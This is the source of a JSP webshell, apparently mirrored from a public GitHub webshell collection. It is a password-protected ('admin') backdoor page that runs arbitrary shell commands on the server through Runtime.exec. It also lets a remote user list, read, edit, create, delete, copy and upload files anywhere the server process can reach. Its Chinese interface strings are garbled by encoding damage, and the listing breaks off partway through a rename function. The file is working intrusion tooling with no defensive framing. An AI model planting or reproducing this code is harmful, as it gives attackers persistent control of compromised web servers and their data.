mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
1780 lines
No EOL
55 KiB
Text
1780 lines
No EOL
55 KiB
Text
<%@ page contentType="text/html; charset=GBK" %>
|
||
<%@ page import="java.io.*"%>
|
||
<%@ page import="java.util.Map"%>
|
||
<%@ page import="java.util.HashMap"%>
|
||
<%@ page import="java.nio.charset.Charset"%>
|
||
<%@ page import="java.util.regex.*"%>
|
||
<%@ page import="java.sql.*"%>
|
||
|
||
<%!
|
||
//it's explame
|
||
private String _password = "admin";
|
||
private String _encodeType = "GB2312";
|
||
private int _sessionOutTime = 20;
|
||
private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"};
|
||
private Connection _dbConnection = null;
|
||
private Statement _dbStatement = null;
|
||
private String _url = null;
|
||
//it's explame
|
||
public boolean validate(String password) {
|
||
if (password.equals(_password)) {
|
||
return true;
|
||
} else {
|
||
return false;
|
||
}
|
||
}
|
||
//it's explame
|
||
public String HTMLEncode(String str) {
|
||
str = str.replaceAll(" ", " ");
|
||
str = str.replaceAll("<", "<");
|
||
str = str.replaceAll(">", ">");
|
||
str = str.replaceAll("\r\n", "<br>");
|
||
|
||
return str;
|
||
}
|
||
//it's explame
|
||
public String Unicode2GB(String str) {
|
||
String sRet = null;
|
||
//it's explame
|
||
try {
|
||
sRet = new String(str.getBytes("ISO8859_1"), _encodeType);
|
||
} catch (Exception e) {
|
||
sRet = str;
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
//it's explame
|
||
public String exeCmd(String cmd) {
|
||
Runtime runtime = Runtime.getRuntime();
|
||
Process proc = null;
|
||
String retStr = "";
|
||
InputStreamReader insReader = null;
|
||
char[] tmpBuffer = new char[1024];
|
||
int nRet = 0;
|
||
//it's explame
|
||
try {
|
||
proc = runtime.exec(cmd);
|
||
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
|
||
|
||
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
|
||
retStr += new String(tmpBuffer, 0, nRet);
|
||
}
|
||
//it's explame
|
||
insReader.close();
|
||
retStr = HTMLEncode(retStr);
|
||
} catch (Exception e) {
|
||
retStr = "<font color=\"red\">bad command \"" + cmd + "\"</font>";
|
||
} finally {
|
||
return retStr;
|
||
}
|
||
}
|
||
//it's explame
|
||
public String pathConvert(String path) {
|
||
String sRet = path.replace('\\', '/');
|
||
File file = new File(path);
|
||
//it's explame
|
||
if (file.getParent() != null) {
|
||
if (file.isDirectory()) {
|
||
if (! sRet.endsWith("/"))
|
||
sRet += "/";
|
||
}
|
||
} else {
|
||
if (! sRet.endsWith("/"))
|
||
sRet += "/";
|
||
}
|
||
//it's explame
|
||
return sRet;
|
||
}
|
||
|
||
public String strCut(String str, int len) {
|
||
String sRet;
|
||
//it's explame
|
||
len -= 3;
|
||
|
||
if (str.getBytes().length <= len) {
|
||
sRet = str;
|
||
} else {
|
||
try {
|
||
sRet = (new String(str.getBytes(), 0, len, "GBK")) + "...";
|
||
} catch (Exception e) {
|
||
sRet = str;
|
||
}
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
//it's explame
|
||
public String listFiles(String path, String curUri) {
|
||
File[] files = null;
|
||
File curFile = null;
|
||
String sRet = null;
|
||
int n = 0;
|
||
boolean isRoot = path.equals("");
|
||
//it's explame
|
||
path = pathConvert(path);
|
||
|
||
try {
|
||
if (isRoot) {
|
||
files = File.listRoots();
|
||
} else {
|
||
try {
|
||
curFile = new File(path);
|
||
String[] sFiles = curFile.list();
|
||
files = new File[sFiles.length];
|
||
|
||
for (n = 0; n < sFiles.length; n ++) {
|
||
files[n] = new File(path + sFiles[n]);
|
||
}
|
||
} catch (Exception e) {
|
||
sRet = "<font color=\"red\">bad path \"" + path + "\"</font>";
|
||
}
|
||
}
|
||
//it's explame
|
||
if (sRet == null) {
|
||
sRet = "\n";
|
||
sRet += "<script language=\"javascript\">\n";
|
||
sRet += "var selectedFile = null;\n";
|
||
sRet += "<!--\n";
|
||
sRet += "function createFolder() {\n";
|
||
sRet += " var folderName = prompt(\"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<C4BF><C2BC>\", \"\");\n";
|
||
sRet += " if (folderName != null && folderName != false && ltrim(folderName) != \"\") {\n";
|
||
sRet += " window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFolder&folderName=\" + folderName + \"" + "\";\n";
|
||
sRet += " }\n";
|
||
sRet += "}\n";
|
||
sRet += "\n";
|
||
sRet += "function createFile() {\n";
|
||
sRet += " var fileName = prompt(\"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>\", \"\");\n";
|
||
sRet += " if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n";
|
||
sRet += " window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFile&fileName=\" + fileName + \"" + "\";\n";
|
||
sRet += " }\n";
|
||
sRet += "}\n";
|
||
sRet += "\n";
|
||
sRet += "function selectFile(obj) {\n";
|
||
sRet += " if (selectedFile != null)\n";
|
||
sRet += " selectedFile.style.backgroundColor = \"#FFFFFF\";\n";
|
||
sRet += " selectedFile = obj;\n";
|
||
sRet += " obj.style.backgroundColor = \"#CCCCCC\";\n";
|
||
sRet += "}\n";
|
||
sRet += "\n";
|
||
sRet += "function change(obj) {\n";
|
||
sRet += " if (selectedFile != obj)\n";
|
||
sRet += " obj.style.backgroundColor = \"#CCCCCC\";\n";
|
||
sRet += "}\n";
|
||
sRet += "\n";
|
||
sRet += "function restore(obj) {\n";
|
||
sRet += " if (selectedFile != obj)\n";
|
||
sRet += " obj.style.backgroundColor = \"#FFFFFF\";\n";
|
||
sRet += "}\n";
|
||
sRet += "\n";
|
||
sRet += "function showUpload() {\n";
|
||
sRet += " up.style.visibility = \"visible\";\n";
|
||
sRet += "}\n";
|
||
sRet += "\n";
|
||
sRet += "function copyFile() {\n";
|
||
sRet += " var toPath = prompt(\"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD>Ƶ<EFBFBD><C6B5><EFBFBD>Ŀ¼(<28><><EFBFBD><EFBFBD>·<EFBFBD><C2B7>)\", \"\");\n";
|
||
sRet += " if (toPath != null && toPath != false && ltrim(toPath) != \"\") {\n";
|
||
sRet += " document.fileList.action = \"" + curUri + "&curPath=" + path + "&fsAction=copyto&dstPath=" + "\" + toPath;\n";
|
||
sRet += " document.fileList.submit();\n";
|
||
sRet += " }\n";
|
||
sRet += "}\n";
|
||
sRet += "\n";
|
||
sRet += "function rename() {\n";
|
||
sRet += " var count = 0;\n";
|
||
sRet += " var selected = -1;\n";
|
||
sRet += " for (var i = 0; i < document.fileList.filesDelete.length; i ++) {\n";
|
||
sRet += " if (document.fileList.filesDelete[i].checked) {\n";
|
||
sRet += " count ++;\n";
|
||
sRet += " selected = i;\n";
|
||
sRet += " }\n";
|
||
sRet += " }\n";
|
||
sRet += " if (count > 1)\n";
|
||
sRet += " alert(\"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>\");\n";
|
||
sRet += " else if (selected == -1)\n";
|
||
sRet += " alert(\"û<><C3BB>ѡ<EFBFBD><D1A1>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>\");\n";
|
||
sRet += " else {\n";
|
||
sRet += " var newName = prompt(\"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>\", \"\");\n";
|
||
sRet += " if (newName != null && newName != false && ltrim(newName) != \"\") {\n";
|
||
sRet += " window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=rename&newName=\" + newName + \"&fileRename=\" + document.fileList.filesDelete[selected].value;";
|
||
sRet += " }\n";
|
||
sRet += " }\n";
|
||
sRet += "}\n";
|
||
sRet += "\n";
|
||
sRet += "//-->\n";
|
||
sRet += "</script>\n";
|
||
sRet += "<table width=\"100%\" border=\"0\" cellpadding=\"2\" cellpadding=\"1\">\n";
|
||
sRet += " <form enctype=\"multipart/form-data\" method=\"post\" name=\"upload\" action=\"" + curUri + "&curPath=" + path + "&fsAction=upload" + "\">\n";
|
||
//it's explame
|
||
if (curFile != null) {
|
||
sRet += " <tr>\n";
|
||
sRet += " <td colspan=\"4\" valign=\"middle\">\n";
|
||
sRet += " <a href=\"" + curUri + "&curPath=" + (curFile.getParent() == null ? "" : pathConvert(curFile.getParent())) + "\"><3E>ϼ<EFBFBD>Ŀ¼</a> ";
|
||
sRet += "<a href=\"#\" onclick=\"javascript:createFolder()\"><3E><><EFBFBD><EFBFBD>Ŀ¼</a> ";
|
||
sRet += "<a href=\"#\" onclick=\"javascript:createFile()\"><3E>½<EFBFBD><C2BD>ļ<EFBFBD></a> ";
|
||
sRet += "<a href=\"#\" onclick=\"javascript:document.fileList.submit();\">ɾ<><C9BE></a> ";
|
||
sRet += "<a href=\"#\" onclick=\"javascript:copyFile()\"><3E><><EFBFBD><EFBFBD></a> ";
|
||
sRet += "<a href=\"#\" onclick=\"javascript:rename()\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a> ";
|
||
sRet += "<a href=\"#\" onclick=\"javascript:showUpload()\"><3E>ϴ<EFBFBD><CFB4>ļ<EFBFBD></a>\n";
|
||
sRet += "<span style=\"visibility: hidden\" id=\"up\"><input type=\"file\" value=\"<22>ϴ<EFBFBD>\" name=\"upFile\" size=\"8\" class=\"textbox\" /> <input type=\"submit\" value=\"<22>ϴ<EFBFBD>\" class=\"button\"></span>\n";
|
||
sRet += " </td>\n";
|
||
sRet += " </tr>\n";
|
||
}
|
||
//it's explame
|
||
sRet += "</form>\n";
|
||
//it's explame
|
||
sRet += " <form name=\"fileList\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=deleteFile" + "\">\n";
|
||
//it's explame
|
||
for (n = 0; n < files.length; n ++) {
|
||
sRet += " <tr onclick=\"javascript: selectFile(this)\" onmouseover=\"javascript: change(this)\" onmouseout=\"javascript: restore(this)\" style=\"cursor:hand;\">\n";
|
||
//it's explame
|
||
if (! isRoot) {
|
||
sRet += " <td width=\"5%\" align=\"center\"><input type=\"checkbox\" name=\"filesDelete\" value=\"" + pathConvert(files[n].getPath()) + "\" /></td>\n";
|
||
if (files[n].isDirectory()) {
|
||
sRet += " <td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\"><" + strCut(files[n].getName(), 50) + "></a></td>\n";
|
||
} else {
|
||
sRet += " <td><a title=\"" + files[n].getName() + "\">" + strCut(files[n].getName(), 50) + "</a></td>\n";
|
||
}
|
||
|
||
sRet += " <td width=\"15%\" align=\"center\">" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<<a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "&fsAction=open" + "\">edit</a>>" : "") + "</td>\n";
|
||
sRet += " <td width=\"15%\" align=\"center\">" + files[n].length() + "</td>\n";
|
||
} else {
|
||
sRet += " <td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\">" + pathConvert(files[n].getPath()) + "</a></td>\n";
|
||
}
|
||
|
||
sRet += " </tr>\n";
|
||
}
|
||
sRet += " </form>\n";
|
||
sRet += "</table>\n";
|
||
}
|
||
} catch (SecurityException e) {
|
||
sRet = "<font color=\"red\">security violation, no privilege.</font>";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public boolean isTextFile(String extName) {
|
||
int i;
|
||
boolean bRet = false;
|
||
|
||
if (! extName.equals("")) {
|
||
for (i = 0; i < _textFileTypes.length; i ++) {
|
||
if (extName.equals(_textFileTypes[i])) {
|
||
bRet = true;
|
||
break;
|
||
}
|
||
}
|
||
} else {
|
||
bRet = true;
|
||
}
|
||
|
||
return bRet;
|
||
}
|
||
|
||
public String getExtName(String fileName) {
|
||
String sRet = "";
|
||
int nLastDotPos;
|
||
//it's explame
|
||
fileName = pathConvert(fileName);
|
||
//it's explame
|
||
nLastDotPos = fileName.lastIndexOf(".");
|
||
|
||
if (nLastDotPos == -1) {
|
||
sRet = "";
|
||
} else {
|
||
sRet = fileName.substring(nLastDotPos + 1);
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public String browseFile(String path) {
|
||
String sRet = "";
|
||
File file = null;
|
||
FileReader fileReader = null;
|
||
//it's explame
|
||
path = pathConvert(path);
|
||
//it's explame
|
||
try {
|
||
file = new File(path);
|
||
fileReader = new FileReader(file);
|
||
String fileString = "";
|
||
char[] chBuffer = new char[1024];
|
||
int ret;
|
||
|
||
sRet = "<script language=\"javascript\">\n";
|
||
|
||
while ((ret = fileReader.read(chBuffer, 0, 1024)) != -1) {
|
||
fileString += new String(chBuffer, 0, ret);
|
||
}
|
||
|
||
sRet += "var wnd = window.open(\"about:blank\", \"_blank\", \"width=600, height=500\");\n";
|
||
sRet += "var doc = wnd.document;\n";
|
||
sRet += "doc.write(\"" + "aaa" + "\");\n";
|
||
//it's explame
|
||
sRet += "</script>\n";
|
||
//it's explame
|
||
} catch (IOException e) {
|
||
sRet += "<script language=\"javascript\">\n";
|
||
sRet += "alert(\"<22><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>" + path + "ʧ<><CAA7>\");\n";
|
||
sRet += "</script>\n";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
//it's explame
|
||
public String openFile(String path, String curUri) {
|
||
String sRet = "";
|
||
boolean canOpen = false;
|
||
int nLastDotPos = path.lastIndexOf(".");
|
||
String extName = "";
|
||
String fileString = null;
|
||
File curFile = null;
|
||
//it's explame
|
||
path = pathConvert(path);
|
||
//it's explame
|
||
if (nLastDotPos == -1) {
|
||
canOpen = true;
|
||
} else {
|
||
extName = path.substring(nLastDotPos + 1);
|
||
canOpen = isTextFile(extName);
|
||
}
|
||
|
||
if (canOpen) {
|
||
try {
|
||
fileString = "";
|
||
curFile = new File(path);
|
||
FileReader fileReader = new FileReader(curFile);
|
||
char[] chBuffer = new char[1024];
|
||
int nRet;
|
||
|
||
while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
|
||
fileString += new String(chBuffer, 0, nRet);
|
||
}
|
||
//it's explame
|
||
fileReader.close();
|
||
} catch (IOException e) {
|
||
fileString = null;
|
||
sRet = "<font color=\"red\"><3E><><EFBFBD>ܴ<EFBFBD><DCB4><EFBFBD><EFBFBD>ļ<EFBFBD>\"" + path + "\"</font>";
|
||
} catch (SecurityException e) {
|
||
fileString = null;
|
||
sRet = "<font color=\"red\"><3E><>ȫ<EFBFBD><C8AB><EFBFBD>⣬û<E2A3AC><C3BB>Ȩ<EFBFBD><C8A8>ִ<EFBFBD>иò<D0B8><C3B2><EFBFBD></font>";
|
||
}
|
||
} else {
|
||
sRet = "<font color=\"red\">file \"" + path + "\" is not a text file, can't be opened in text mode</font>";
|
||
}
|
||
|
||
if (fileString != null) {
|
||
sRet += "<script language=\"javascript\">";
|
||
sRet += "<!--\n";
|
||
sRet += "function saveAs() {\n";
|
||
sRet += " var fileName = prompt(\"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>\", \"\");\n";
|
||
sRet += " if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n";
|
||
sRet += " document.openfile.action=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\" + fileName + \"&fsAction=saveAs\";\n";
|
||
sRet += " document.openfile.submit();\n";
|
||
sRet += " }\n";
|
||
sRet += "}\n";
|
||
sRet += "//-->\n";
|
||
sRet += "</script>\n";
|
||
sRet += "<table align=\"center\" width=\"100%\" cellpadding=\"2\" cellspacing=\"1\">\n";
|
||
sRet += " <form name=\"openfile\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=save" + "\">\n";
|
||
sRet += " <tr>\n";
|
||
sRet += " <td>[<a href=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\"><3E>ϼ<EFBFBD>Ŀ¼</a>]</td>\n";
|
||
sRet += " </tr>\n";
|
||
sRet += " <tr>\n";
|
||
sRet += " <td align=\"center\">\n";
|
||
sRet += " <textarea name=\"fileContent\" cols=\"80\" rows=\"32\">\n";
|
||
sRet += fileString;
|
||
sRet += " </textarea>\n";
|
||
sRet += " </td>\n";
|
||
sRet += " </tr>\n";
|
||
sRet += " <tr>\n";
|
||
sRet += " <td align=\"center\"><input type=\"submit\" class=\"button\" value=\"<22><><EFBFBD><EFBFBD>\" /> <input type=\"button\" class=\"button\" value=\"<22><><EFBFBD><EFBFBD>Ϊ\" onclick=\"javascript:saveAs()\" /></td>\n";
|
||
sRet += " </tr>\n";
|
||
sRet += " </form>\n";
|
||
sRet += "</table>\n";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public String saveFile(String path, String curUri, String fileContent) {
|
||
String sRet = "";
|
||
File file = null;
|
||
|
||
path = pathConvert(path);
|
||
|
||
try {
|
||
file = new File(path);
|
||
|
||
if (! file.canWrite()) {
|
||
sRet = "<font color=\"red\"><3E>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>д</font>";
|
||
} else {
|
||
FileWriter fileWriter = new FileWriter(file);
|
||
fileWriter.write(fileContent);
|
||
|
||
fileWriter.close();
|
||
sRet = "<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڷ<EFBFBD><DAB7>أ<EFBFBD><D8A3><EFBFBD><EFBFBD>Ժ<D4BA>\n";
|
||
sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />\n";
|
||
}
|
||
} catch (IOException e) {
|
||
sRet = "<font color=\"red\"><3E><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>ʧ<EFBFBD><CAA7></font>";
|
||
} catch (SecurityException e) {
|
||
sRet = "<font color=\"red\"><3E><>ȫ<EFBFBD><C8AB><EFBFBD>⣬û<E2A3AC><C3BB>Ȩ<EFBFBD><C8A8>ִ<EFBFBD>иò<D0B8><C3B2><EFBFBD></font>";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public String createFolder(String path, String curUri, String folderName) {
|
||
String sRet = "";
|
||
File folder = null;
|
||
|
||
path = pathConvert(path);
|
||
|
||
try {
|
||
folder = new File(path + folderName);
|
||
|
||
if (folder.exists() && folder.isDirectory()) {
|
||
sRet = "<font color=\"red\">\"" + path + folderName + "\"Ŀ¼<C4BF>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD></font>";
|
||
} else {
|
||
if (folder.mkdir()) {
|
||
sRet = "<22>ɹ<EFBFBD><C9B9><EFBFBD><EFBFBD><EFBFBD>Ŀ¼\"" + pathConvert(folder.getPath()) + "\"<22><><EFBFBD><EFBFBD><EFBFBD>ڷ<EFBFBD><DAB7>أ<EFBFBD><D8A3><EFBFBD><EFBFBD>Ժ<D4BA>\n";
|
||
sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + folderName + "\" />";
|
||
} else {
|
||
sRet = "<font color=\"red\"><3E><><EFBFBD><EFBFBD>Ŀ¼\"" + folderName + "\"ʧ<><CAA7></font>";
|
||
}
|
||
}
|
||
} catch (SecurityException e) {
|
||
sRet = "<font color=\"red\"><3E><>ȫ<EFBFBD><C8AB><EFBFBD>⣬û<E2A3AC><C3BB>Ȩ<EFBFBD><C8A8>ִ<EFBFBD>иò<D0B8><C3B2><EFBFBD></font>";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public String createFile(String path, String curUri, String fileName) {
|
||
String sRet = "";
|
||
File file = null;
|
||
|
||
path = pathConvert(path);
|
||
|
||
try {
|
||
file = new File(path + fileName);
|
||
|
||
if (file.createNewFile()) {
|
||
sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + fileName + "&fsAction=open" + "\" />";
|
||
} else {
|
||
sRet = "<font color=\"red\">\"" + path + fileName + "\"<22>ļ<EFBFBD><C4BC>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD></font>";
|
||
}
|
||
} catch (SecurityException e) {
|
||
sRet = "<font color=\"red\"><3E><>ȫ<EFBFBD><C8AB><EFBFBD>⣬û<E2A3AC><C3BB>Ȩ<EFBFBD><C8A8>ִ<EFBFBD>иò<D0B8><C3B2><EFBFBD></font>";
|
||
} catch (IOException e) {
|
||
sRet = "<font color=\"red\"><3E><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>\"" + path + fileName + "\"ʧ<><CAA7></font>";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public String deleteFile(String path, String curUri, String[] files2Delete) {
|
||
String sRet = "";
|
||
File tmpFile = null;
|
||
|
||
try {
|
||
for (int i = 0; i < files2Delete.length; i ++) {
|
||
tmpFile = new File(files2Delete[i]);
|
||
if (! tmpFile.delete()) {
|
||
sRet += "<font color=\"red\">ɾ<><C9BE>\"" + files2Delete[i] + "\"ʧ<><CAA7></font><br>\n";
|
||
}
|
||
}
|
||
|
||
if (sRet.equals("")) {
|
||
sRet = "ɾ<><C9BE><EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڷ<EFBFBD><DAB7>أ<EFBFBD><D8A3><EFBFBD><EFBFBD>Ժ<D4BA>\n";
|
||
sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
|
||
}
|
||
} catch (SecurityException e) {
|
||
sRet = "<font color=\"red\"><3E><>ȫ<EFBFBD><C8AB><EFBFBD>⣬û<E2A3AC><C3BB>Ȩ<EFBFBD><C8A8>ִ<EFBFBD>иò<D0B8><C3B2><EFBFBD></font>\n";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public String saveAs(String path, String curUri, String fileContent) {
|
||
String sRet = "";
|
||
File file = null;
|
||
FileWriter fileWriter = null;
|
||
|
||
try {
|
||
file = new File(path);
|
||
|
||
if (file.createNewFile()) {
|
||
fileWriter = new FileWriter(file);
|
||
fileWriter.write(fileContent);
|
||
fileWriter.close();
|
||
|
||
sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />";
|
||
} else {
|
||
sRet = "<font color=\"red\"><3E>ļ<EFBFBD>\"" + path + "\"<22>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD></font>";
|
||
}
|
||
} catch (IOException e) {
|
||
sRet = "<font color=\"red\"><3E><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>\"" + path + "\"ʧ<><CAA7></font>";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
|
||
public String uploadFile(ServletRequest request, String path, String curUri) {
|
||
String sRet = "";
|
||
File file = null;
|
||
InputStream in = null;
|
||
|
||
path = pathConvert(path);
|
||
|
||
try {
|
||
in = request.getInputStream();
|
||
|
||
byte[] inBytes = new byte[request.getContentLength()];
|
||
int nBytes;
|
||
int start = 0;
|
||
int end = 0;
|
||
int size = 1024;
|
||
String token = null;
|
||
String filePath = null;
|
||
|
||
//
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD><EFBFBD><EFBFBD>
|
||
//
|
||
while ((nBytes = in.read(inBytes, start, size)) != -1) {
|
||
start += nBytes;
|
||
}
|
||
|
||
in.close();
|
||
//
|
||
// <20><><EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>еõ<D0B5><C3B5>ļ<EFBFBD><C4BC>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD>
|
||
//
|
||
int i = 0;
|
||
byte[] seperator;
|
||
|
||
while (inBytes[i] != 13) {
|
||
i ++;
|
||
}
|
||
|
||
seperator = new byte[i];
|
||
|
||
for (i = 0; i < seperator.length; i ++) {
|
||
seperator[i] = inBytes[i];
|
||
}
|
||
|
||
//
|
||
// <20>õ<EFBFBD>Header<65><72><EFBFBD><EFBFBD>
|
||
//
|
||
String dataHeader = null;
|
||
i += 3;
|
||
start = i;
|
||
while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) {
|
||
i ++;
|
||
}
|
||
end = i - 1;
|
||
dataHeader = new String(inBytes, start, end - start + 1);
|
||
|
||
//
|
||
// <20>õ<EFBFBD><C3B5>ļ<EFBFBD><C4BC><EFBFBD>
|
||
//
|
||
token = "filename=\"";
|
||
start = dataHeader.indexOf(token) + token.length();
|
||
token = "\"";
|
||
end = dataHeader.indexOf(token, start) - 1;
|
||
filePath = dataHeader.substring(start, end + 1);
|
||
filePath = pathConvert(filePath);
|
||
String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);
|
||
|
||
//
|
||
// <20>õ<EFBFBD><C3B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>ݿ<EFBFBD>ʼλ<CABC><CEBB>
|
||
//
|
||
i += 4;
|
||
start = i;
|
||
|
||
/*
|
||
boolean found = true;
|
||
byte[] tmp = new byte[seperator.length];
|
||
while (i <= inBytes.length - 1 - seperator.length) {
|
||
|
||
for (int j = i; j < i + seperator.length; j ++) {
|
||
if (seperator[j - i] != inBytes[j]) {
|
||
found = false;
|
||
break;
|
||
} else
|
||
tmp[j - i] = inBytes[j];
|
||
}
|
||
|
||
if (found)
|
||
break;
|
||
|
||
i ++;
|
||
}*/
|
||
|
||
//
|
||
// ͵<><CDB5><EFBFBD>İ취
|
||
//
|
||
end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
|
||
|
||
//
|
||
// <20><><EFBFBD><EFBFBD>Ϊ<EFBFBD>ļ<EFBFBD>
|
||
//
|
||
File newFile = new File(path + fileName);
|
||
newFile.createNewFile();
|
||
FileOutputStream out = new FileOutputStream(newFile);
|
||
|
||
//out.write(inBytes, start, end - start + 1);
|
||
out.write(inBytes, start, end - start + 1);
|
||
out.close();
|
||
|
||
sRet = "<script language=\"javascript\">\n";
|
||
sRet += "alert(\"<22>ļ<EFBFBD><C4BC>ϴ<EFBFBD><CFB4>ɹ<EFBFBD>" + fileName + "\");\n";
|
||
sRet += "</script>\n";
|
||
} catch (IOException e) {
|
||
sRet = "<script language=\"javascript\">\n";
|
||
sRet += "alert(\"<22>ļ<EFBFBD><C4BC>ϴ<EFBFBD>ʧ<EFBFBD><CAA7>\");\n";
|
||
sRet += "</script>\n";
|
||
}
|
||
|
||
sRet += "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "\" />";
|
||
return sRet;
|
||
}
|
||
|
||
public boolean fileCopy(String srcPath, String dstPath) {
|
||
boolean bRet = true;
|
||
|
||
try {
|
||
FileInputStream in = new FileInputStream(new File(srcPath));
|
||
FileOutputStream out = new FileOutputStream(new File(dstPath));
|
||
byte[] buffer = new byte[1024];
|
||
int nBytes;
|
||
|
||
|
||
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
|
||
out.write(buffer, 0, nBytes);
|
||
}
|
||
|
||
in.close();
|
||
out.close();
|
||
} catch (IOException e) {
|
||
bRet = false;
|
||
}
|
||
|
||
return bRet;
|
||
}
|
||
|
||
public String getFileNameByPath(String path) {
|
||
String sRet = "";
|
||
|
||
path = pathConvert(path);
|
||
|
||
if (path.lastIndexOf("/") != -1) {
|
||
sRet = path.substring(path.lastIndexOf("/") + 1);
|
||
} else {
|
||
sRet = path;
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) {
|
||
String sRet = "";
|
||
int i;
|
||
|
||
path = pathConvert(path);
|
||
dstPath = pathConvert(dstPath);
|
||
|
||
for (i = 0; i < files2Copy.length; i ++) {
|
||
if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) {
|
||
sRet += "<font color=\"red\"><3E>ļ<EFBFBD>\"" + files2Copy[i] + "\"<22><><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7></font><br/>";
|
||
}
|
||
}
|
||
|
||
if (sRet.equals("")) {
|
||
sRet = "<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>Ƴɹ<C6B3><C9B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڷ<EFBFBD><DAB7>أ<EFBFBD><D8A3><EFBFBD><EFBFBD>Ժ<D4BA>";
|
||
sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public boolean isFileName(String fileName) {
|
||
boolean bRet = false;
|
||
|
||
Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$");
|
||
Matcher m = p.matcher(fileName);
|
||
|
||
bRet = m.matches();
|
||
|
||
return bRet;
|
||
}
|
||
|
||
public String renameFile(String path, String curUri, String file2Rename, String newName) {
|
||
String sRet = "";
